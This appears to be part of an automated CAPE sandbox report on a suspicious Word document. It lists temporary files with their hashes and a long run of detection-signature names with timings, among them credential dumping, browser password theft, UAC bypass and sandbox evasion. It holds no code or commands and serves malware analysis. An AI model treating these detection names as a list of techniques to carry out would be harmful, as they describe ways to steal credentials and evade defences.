CAPE Yara None matched
File name Normal.dotm
Associated Filenames
C:\Users\user\AppData\Roaming\Microsoft\Templates\Normal.dotm
File Size 20381 bytes
File Type Microsoft Word 2007+
MD5 23f4c984d111e7c0851f13b5a39e23bf
SHA1 f0b6cf9e53e9b5396275341984cb781ee9c52e80
SHA256 3ade1df494b161cd3616664ccf82d732eea6a648eefe4bfdc285c21be9e51966
CRC32 B554EAE8
Ssdeep 384:Pjl7/J/5ehBcSV+qEPG6yGUTBIOoX4+hD9Qn6eF7y1SFmlEeP:d/JQoG2vX4+hD9IZY
ClamAV None
Yara None matched
CAPE Yara None matched
File name ~$Normal.dotm
Associated Filenames
C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
C:\Users\user\AppData\Local\Temp\~$pjlr0l6ur.doc
File Size 162 bytes
File Type data
MD5 2275bc9c3694bc9bde8e2a2fb5da3832
SHA1 88ce05eea6654a8cabb88573cb91415574ca7fe6
SHA256 33032fd3a87b547b72715f2ca01298be0495fca9d47062e27e0e52455100183b
CRC32 2E0F17E1
Ssdeep 3:2H/9lyX/3L7YMlbK7g7lxItOFSbl//st/:wVSlxK7ghqOFyct/
ClamAV None
Yara None matched
CAPE Yara None matched
File name MSForms.exd
Associated Filenames
C:\Users\user\AppData\Local\Temp\Word8.0\MSForms.exd
File Size 166724 bytes
File Type data
MD5 501d34ba4111ca14fdaa8027dc01ab46
SHA1 49c66fb6dbf1d7b44d73e2657bf7a0ff81106bce
SHA256 cefde0d11ee55f4b7dfdaf2daef6a9f861d15504b159cd0bf840daad3d19f329
CRC32 5DEC5E81
Ssdeep 1536:IQWu6L6wNSc8SetKB4YuiMOqQ/WVMO+O9sOHK7K2xBmsqsDPza7vKp:I+6jNSc83tKBduiMnWOXTK7K1Kp
ClamAV None
Yara None matched
CAPE Yara None matched
File name 618D96C.wmf
Associated Filenames
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\618D96C.wmf
File Size 444 bytes
File Type ms-windows metafont .wmf
MD5 02c04320c7f974484ec62b6e8bf9d7ed
SHA1 a4a5ef12b3a3fcd0565f2ed57f4639a42fcbb3b2
SHA256 b2d224dedf3c3cc95cc45cf2672a7fefd7555c93cb8a41e75cf1cf27aa23e80c
CRC32 E707A565
Ssdeep 12:Mh86p058QYNAPzSxsfb0R4EXSvCzSNzztl:O905TZzSWfbUYvnzxl
ClamAV None
Yara None matched
CAPE Yara None matched
File name 3843BE5A.wmf
Associated Filenames
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3843BE5A.wmf
File Size 444 bytes
File Type ms-windows metafont .wmf
MD5 c7db039d154512f4b85e912d6f120772
SHA1 a97a5059f5b6d3cdf0e75aacf8f89aa91d3528ee
SHA256 19a212d0eb04f1727bd3307404e8854d85563159d5b36a080b2337308ecc18e6
CRC32 2C282FB8
Ssdeep 12:Mh86p058QYNAPzSxsfb0R4EXSvCzSN9sztl:O905TZzSWfbUYvnCxl
ClamAV None
Yara None matched
CAPE Yara None matched
File name 36EA6778.wmf
Associated Filenames
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\36EA6778.wmf
File Size 444 bytes
File Type ms-windows metafont .wmf
MD5 d29ac02ab3757c677a341e6bf161acb2
SHA1 67eee2f9b93d72e117ae3f40c6a781e87cadeaeb
SHA256 abedeba4044399e5c125c3dd96049b59668abfca06640017ac966e8dbb591011
CRC32 7ACD099D
Ssdeep 12:Mh86p058QYNAPzSxsfb0R4EXSvCzSNrcZztl:O905TZzSWfbUYvnrcZxl
ClamAV None
Yara None matched
CAPE Yara None matched
File name E846D446.wmf
Associated Filenames
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E846D446.wmf
File Size 444 bytes
File Type ms-windows metafont .wmf
MD5 518b8105450791d4fca69daefb0746af
SHA1 99e669058351a55d939870d5badba567a9d48cae
SHA256 87921e2d1e94f13a69c1af57dc2a2514967649c4c06b03b48f182591688c2c79
CRC32 0BC16C62
Ssdeep 12:Mh86p058QYNAPzSxsfb0R4EXSvCzSNP2ztl:O905TZzSWfbUYvn+xl
ClamAV None
Yara None matched
CAPE Yara None matched
File name 8474B044.wmf
Associated Filenames
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8474B044.wmf
File Size 444 bytes
File Type ms-windows metafont .wmf
MD5 f7d0f1535f460d5e82a2eb8e0467d7f0
SHA1 e98341334099b25a5a55cf8eeb396b513ec66107
SHA256 c702e3571e8f9176192e2cd3b6764254406f51fe04b95b9d59d8d5f67431b21a
CRC32 BE10DD64
Ssdeep 12:Mh86p058QYNAPzSxsfb0R4EXSvCzSNsXztl:O905TZzSWfbUYvnsXxl
ClamAV None
Yara None matched
CAPE Yara None matched
File name B5A32F2.wmf
Associated Filenames
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B5A32F2.wmf
File Size 444 bytes
File Type ms-windows metafont .wmf
MD5 0e84ea76d84c558d3be649c6550ced52
SHA1 61f073fba7dacbadba490fa05fce739bd3f1e474
SHA256 509420dc61926cbb6fec6508491713eda5e833011fdc69fd2a0c9b9f475b7574
CRC32 FC2CF924
Ssdeep 12:Mh86p058QYNAPzSxsfb0R4EXSvCzSNlztl:O905TZzSWfbUYvnlxl
ClamAV None
Yara None matched
CAPE Yara None matched
File name BBT2PZNY16H6UO4BLGV1.temp
Associated Filenames
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\BBT2PZNY16H6UO4BLGV1.temp
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
File Size 8016 bytes
File Type data
MD5 23e45f83b252ea16742589490d1f00a6
SHA1 6cb492e9e79666b8e81a3fd7004367d31f341707
SHA256 916da09fe86ab13bf01a57451a5ec9ea88b6f9acd4eb53efc561c0b85571426b
CRC32 4E3CB4EA
Ssdeep 96:sqCUdMqY4+qvsqvJCwor1aqCUdMqY4+qvsEHyqvJCwort1CCX3MbH8bIxCXAlUVP:sE1or1aEdHnort1CCZbIxClQe
ClamAV None
Yara None matched
CAPE Yara None matched
File name GDIPFONTCACHEV1.DAT
Associated Filenames
C:\Users\user\AppData\Local\GDIPFONTCACHEV1.DAT
File Size 86096 bytes
File Type data
MD5 1bba2e8a1b56ec52dd7805093b4839d3
SHA1 8d507ec6e5c4af348304f38c85227cbdca17a1f3
SHA256 2df0e9bc46893be214dc9da3ce78ba97b4176ee761ec3f38f0139297490f5341
CRC32 AEF024B5
Ssdeep 768:3v4h0tHgTlF1AphohIqrT43MTxK8PU/NBxZysNAp:Qh0tHgTlF1AphADhTxK8PU/NBD6p
ClamAV None
Yara None matched
CAPE Yara None matched
File name CUSTOM.DIC
Associated Filenames
C:\Users\user\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC
File Size 2 bytes
File Type Little-endian UTF-16 Unicode text, with no line terminators
MD5 f3b25701fe362ec84616a93a45ce9998
SHA1 d62636d8caec13f04e28442a0a6fa1afeb024bbb
SHA256 b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209
CRC32 88F83096
Ssdeep 3:Qn:Qn
ClamAV None
Yara None matched
CAPE Yara None matched
Display Text
\xff\xfe
File name ~WRS{24BB29B5-31E2-492F-A1C2-B9A7CAF0970F}.tmp
Associated Filenames
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{24BB29B5-31E2-492F-A1C2-B9A7CAF0970F}.tmp
File Size 1024 bytes
File Type data
MD5 5d4d94ee7e06bbb0af9584119797b23a
SHA1 dbb111419c704f116efa8e72471dd83e86e49677
SHA256 4826c0d860af884d3343ca6460b0006a7a2ce7dbccc4d743208585d997cc5fd1
CRC32 23C03491
Ssdeep 3:ol3lYdn:4Wn
ClamAV None
Yara None matched
CAPE Yara None matched
File name Word14.customUI
Associated Filenames
C:\Users\user\AppData\Local\Microsoft\Office\Word14.customUI
File Size 3513 bytes
File Type Microsoft OOXML
MD5 b022439244ee91625c99a91c666eb0fb
SHA1 84a647b0bc5457c74c631361e8fad1dadd0852c8
SHA256 2a439ab0ccf43f70f80f6b929f9ea29ac6a6666b9abce9921105dc72e7fda8ca
CRC32 CC7E186E
Ssdeep 48:9mV5NrJ54E1SO6xLfUMcZ0BIKoGn5FxwYzZX2ynWM2d8gy7znl:UV5RJ4xFOYtXl
ClamAV None
Yara None matched
CAPE Yara None matched
File name ~WRF{758F78BC-E4A0-41F0-BD45-D36B0B402034}.tmp
Associated Filenames
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{758F78BC-E4A0-41F0-BD45-D36B0B402034}.tmp
File Size 125952 bytes
File Type Composite Document File V2 Document, No summary info
MD5 b376740ceedd1192ca33a7f306b188a4
SHA1 9201a92f34f4876a2e295ae4f116aa322536ff44
SHA256 fdf6f108d231b6107cc2e75d94c4902ee0835719cff6293d6e4b025689229cd8
CRC32 855EA49D
Ssdeep 3072:RlT4uL3BZ6E01JH1WMWB4xw9DeGC4+g3FbOfudn:Hn4JH1O5DeGC4+g3xOfKn
ClamAV None
Yara None matched
CAPE Yara None matched
File name tmpjlr0l6ur.doc
Associated Filenames
C:\Users\user\AppData\Local\Temp\tmpjlr0l6ur.doc
File Size 216576 bytes
File Type Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: Re-contextualized, Subject: TCP, Author: Delmer Reichert, Keywords: Japan, Comments: Small Soft Towels, Template: Normal.dotm, Last Saved By: Arjun Flatley, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Tue Oct 8 21:38:00 2019, Last Saved Time/Date: Tue Oct 8 21:38:00 2019, Number of Pages: 1, Number of Words: 29, Number of Characters: 168, Security: 0
MD5 3c97fd74bbe556ed5e5d00b0176e79f8
SHA1 ccab819281040378fe6c825d0703fc5bac79f149
SHA256 6743e819a34e26290e4b9e7692ff5a063cdc0d48cc87f6c77fb3c28097db79e4
CRC32 7725EB06
Ssdeep 6144:cGdugICAs3MXPxTqfVh6qYn4JH1O5DeWje6:cGdugIE3WxTqfbNNJH0FeWj
ClamAV None
Yara None matched
CAPE Yara None matched
Sorry! No CAPE files.
Sorry! No process dumps.

Processing ( 47.808 seconds )

  • 45.599 BehaviorAnalysis
  • 0.792 CAPE
  • 0.473 Dropped
  • 0.36 Static
  • 0.345 Deduplicate
  • 0.105 TargetInfo
  • 0.099 TrID
  • 0.014 Strings
  • 0.012 NetworkAnalysis
  • 0.007 AnalysisInfo
  • 0.002 Debug

Signatures ( 10.266 seconds )

  • 1.825 stealth_timeout
  • 1.757 api_spamming
  • 1.445 decoy_document
  • 1.408 NewtWire Behavior
  • 0.627 antivm_generic_scsi
  • 0.55 antiav_detectreg
  • 0.488 antidbg_windows
  • 0.301 antivm_generic_services
  • 0.193 infostealer_ftp
  • 0.147 uac_bypass_eventvwr
  • 0.114 antianalysis_detectreg
  • 0.107 infostealer_im
  • 0.102 recon_programs
  • 0.073 mimics_filetime
  • 0.066 Doppelganging
  • 0.058 antivm_vbox_keys
  • 0.057 stealth_file
  • 0.044 antivm_generic_disk
  • 0.039 antivm_vmware_keys
  • 0.038 bootkit
  • 0.036 recon_fingerprint
  • 0.033 virus
  • 0.031 kibex_behavior
  • 0.029 antivm_parallels_keys
  • 0.029 antivm_xen_keys
  • 0.028 darkcomet_regkeys
  • 0.027 antivm_vbox_window
  • 0.023 hancitor_behavior
  • 0.022 betabot_behavior
  • 0.022 antisandbox_script_timer
  • 0.021 InjectionCreateRemoteThread
  • 0.021 antiav_detectfile
  • 0.021 geodo_banking_trojan
  • 0.02 injection_createremotethread
  • 0.019 antivm_generic_diskreg
  • 0.019 antivm_vpc_keys
  • 0.018 injection_runpe
  • 0.017 InjectionProcessHollowing
  • 0.014 InjectionInterProcess
  • 0.014 infostealer_bitcoin
  • 0.013 antiemu_wine_func
  • 0.013 dynamic_function_loading
  • 0.012 malicious_dynamic_function_loading
  • 0.012 persistence_autorun
  • 0.011 antidebug_guardpages
  • 0.011 exploit_heapspray
  • 0.011 infostealer_browser_password
  • 0.011 kovter_behavior
  • 0.011 ransomware_files
  • 0.009 antivm_xen_keys
  • 0.009 antivm_hyperv_keys
  • 0.009 bypass_firewall
  • 0.009 packer_armadillo_regkey
  • 0.009 remcos_regkeys
  • 0.008 stack_pivot
  • 0.008 exploit_getbasekerneladdress
  • 0.008 antivm_vbox_files
  • 0.007 infostealer_browser
  • 0.007 antivm_generic_bios
  • 0.007 antivm_generic_cpu
  • 0.007 antivm_generic_system
  • 0.006 antivm_vbox_libs
  • 0.006 antiav_avast_libs
  • 0.006 exploit_gethaldispatchtable
  • 0.006 shifu_behavior
  • 0.006 browser_security
  • 0.005 office_flash_load
  • 0.005 antisandbox_sleep
  • 0.005 disables_browser_warn
  • 0.005 ransomware_extensions
  • 0.004 Vidar Behavior
  • 0.004 antisandbox_sunbelt_libs
  • 0.004 EvilGrab
  • 0.004 Raccoon Behavior
  • 0.004 InjectionSetWindowLong
  • 0.003 hawkeye_behavior
  • 0.003 injection_explorer
  • 0.003 antisandbox_sboxie_libs
  • 0.003 exec_crash
  • 0.003 neshta_files
  • 0.003 antiav_bitdefender_libs
  • 0.003 antianalysis_detectfile
  • 0.003 antidbg_devices
  • 0.002 persistence_registry_script
  • 0.002 stack_pivot_file_created
  • 0.002 tinba_behavior
  • 0.002 network_tor
  • 0.002 rat_nanocore
  • 0.002 persistence_bootexecute
  • 0.002 rat_luminosity
  • 0.002 RegBinary
  • 0.002 TransactedHollowing
  • 0.002 ipc_namedpipe
  • 0.002 dyre_behavior
  • 0.002 persistence_autorun_tasks
  • 0.002 antiemu_wine_reg
  • 0.002 antivm_vbox_devices
  • 0.002 antivm_vmware_files
  • 0.002 browser_addon
  • 0.002 modify_proxy
  • 0.002 rat_pcclient
  • 0.001 lsass_credential_dumping
  • 0.001 banker_prinimalka
  • 0.001 sets_autoconfig_url
  • 0.001 Sodinokibi Behavior
  • 0.001 dridex_behavior
  • 0.001 antivm_vmware_libs
  • 0.001 gootkit_behavior
  • 0.001 modifies_desktop_wallpaper
  • 0.001 Locky_behavior
  • 0.001 creates_largekey
  • 0.001 kazybot_behavior
  • 0.001 h1n1_behavior
  • 0.001 encrypted_ioc
  • 0.001 PlugX
  • 0.001 vawtrak_behavior
  • 0.001 cerber_behavior
  • 0.001 bot_drive
  • 0.001 codelux_behavior
  • 0.001 disables_system_restore
  • 0.001 disables_windows_defender
  • 0.001 office_martian_children
  • 0.001 modify_security_center_warnings
  • 0.001 modify_uac_prompt
  • 0.001 network_torgateway
  • 0.001 office_macro
  • 0.001 persistence_shim_database
  • 0.001 recon_checkip
  • 0.001 sniffer_winpcap
  • 0.001 stealth_hiddenreg
  • 0.001 stealth_hide_notifications
  • 0.001 targeted_flame

Reporting ( 0.223 seconds )

  • 0.223 CompressResults
Task ID 94394
Mongo ID 5d9e78bbc3c009112d67cdf7
Cuckoo release 1.3-CAPE